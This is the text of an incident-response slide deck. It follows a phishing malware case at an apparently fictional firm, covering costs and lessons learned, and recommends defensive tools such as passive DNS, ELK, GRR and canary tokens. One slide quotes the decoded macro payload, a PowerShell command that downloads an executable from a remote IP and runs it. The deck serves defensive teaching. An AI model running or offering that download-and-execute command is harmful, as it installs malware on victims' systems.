Up your Game

In the wake of Dear CEO

Who am I• Security Team Lead @ Logicalis Jersey

• Incorporated Engineer (IEng) / Chartered IT professional (CITP)

• Channel Island s Information Security Forum (CIISF) founder

• Secretary British Computer Society Jersey

• My role is a mixture of offense and defence for clients of all sizes and verticals including forensic malware investigations.

How we got here“We expect that registered persons will take appropriate steps to properly manage their cyber security arrangements”cyber-security arrangements”The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber security risks A registered person should:

• Understand (and document) the risk of a cyber-attack on their business …

• Have in place appropriate contingency arrangements that they can deploy in the event of a cyber attack

• Review these matters and test their effectiveness

5 Key Questions – Incident Response

[1] Can we determine how many hosts and when they talked to the bad domain? How far can we go back in time to check /prove this?

[2] What information do we have available to us? Logs? Endpoint protection system?

[3] Did any of the affected hosts communicate with other network system. If they did, what occurred?

[4] How long did it take us to detect and remedy the incident

[5] What was the cost to the business?

Incident Response StagesPreparation

Incident

IdentificationEradication

Recovery

Lessons Learned Without information, you

cannot respond!!

The more information that you have the better your response.

Effective Incident response is about being able to pivot quickly and direct your response accordingly.

Meet Calculon Inc.

300

100 90Cayman = 50BVI = 50Time = - 5 hours

Jersey = 180Guernsey =100London = 20

HK = 40Kuala Lumpur = 30 Shanghai = 20Time = +8 hours

Preparation - Threat ModelThreat Vulnerability Impact Business

ImpactControls

Email Phishing Social Engineering

Possible Compromise

System rebuild LoggingAnti Virus

Malvertising Attack

Outdated Adobe Flash

Possible Compromise

System rebuild Ad BlockerAnti Virus

Web Attack against culculon.com

Vulnerability in web application stack

Website compromised

Reputational Loss

Keep website stack up to date

DDOS against Culculon.com

Insufficient bandwidth

Website not available

Minor reputational loss

Consider DDOS protection

Preparation - Cyber kill chain

“You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You cant plan for that. That’s Life”

2016 2016Day 1 2 3 4 5 6 7

Phishing email received11/11/2016

System cleanup started11/11/2016

Systems cleanup completed11/14/2016

11/11/2016 Identify Infected systems

11/11/2016 Delete Citrix users profiles

11/11/2016 Disconnect infected systems from network

11/11/2016 - 11/14/2016 Rebuild infected systems

11/11/2016 Delete email from Exchange server

11/11/2016 Inform BVI/Cayman of the attack

11/14/2016 - 11/16/2016Reporting

11/17/2016Cost of incident

Incident – Malware Attack

Incident – Malware attackIt has code hidden in Excel spreadsheet

When decoded it becomes…..

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.

88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\

JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

VBA macro virus with hidden URL

Incident – Lessons Learned

[1] Insufficent logging available

[2] “Triage” took too long

[4] Volatile Forensic data lost

[3] Lack of support skills in outside UK locations

[5] USB / DLP / Drive Encryption made analysis difficult

[6] AV showed no infection / Incident response tools showed no malicious processes

[7] Reporting took too long

Incident 1 – Business Cost

25 who clicked email phishCitrix = 12Various Locations

Jersey,Guernsey and London

KL Calculon partner

HK Calculon senior executive

12 x Citrix Users - £150 per hour – 6 Hours = £3,600

9 x Citrix Users - £200 per hour – 10 Hours = £18,000

4 x Citrix Users - £400 per hour – 5 Hours = £8,000

IT support Costs = £2,000

Total Cost = £31,600

Improving Our Response – Passive DNS

https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/

[1] Cheap to setup

[2] Use ‘Bro’ with Intel Critical Stack

https://nullsecure.org/building-your-own-passivedns-feed/

[3] Solves Question 1

Endpoint Logging[1] Level One

• User logins / logoff events• User Account creation, deletion and modification

[2] Level Two• Process creation / termination on systems• Use of sensitive privileges

[3] Must Have• Logs must be stored centrally – avoids anti forensics clearing of logs• Available for historic querying and hunting of suspicious activity

Endpoint Forensics[1] Directly examine the memory

• Not susceptible to malware tampering.• More information available – malware can’t hide.

[2] Scalability• We need to be able to ask questions of systems remotely.• Allows us to pivot and focus on what needs to “get done” in an incident.

[3] Memory Samples• Contain information as well as disk artefacts.• Existing “Live IR” tools are insufficient.

Threat Hunting = Endpoint Logging + Forensics + Netflow

ELK Stack Explained

ELK Demo

Google Rapid ResponseCross-platform support for Linux, Mac OS X and Windows clients.

Live remote memory analysis and imaging

Powerful search and download capabilities for files and the Windows registry.

Secure communication infrastructure designed for Internet deployment.

Detailed monitoring of client CPU, memory, IO usage and self-imposed limits

https://github.com/google/grr

Reporting / Compliance

https://github.com/certsocietegenerale/FIR

Python / Django Web Application

Open sourced by Societe Generale Incident Response Team

Customisable and freely available to you to record your incidents in.

GPL V3 licensed – You can make change for your own use.

Canaries, Tokens and Honey Hashes

Canary Token: Something you put on your network, if opened you get an email alert

Canary Device: A honeypot with an internet console that pretends to mimic something else that creates alerts when accessed.

Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The Hash attacks.

Integrating SIEM into your response

Endpoint logging and forensics integrated via event collectors

Threat intelligence feeds directly integrated into SIEM

AV / Next gen AV supported

Passive DNS integrated

Bridging the skills gap

Forensic Images:http://www.forensicfocus.com/images-and-challenges

Volatility Framework: http://volatility-labs.blogspot.com/

Incident Response: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf

Questions

Can your organisation prevent, detect and respond to cyber security threats that you face?

In an incident could you answer the five key questions?

@cyberkryption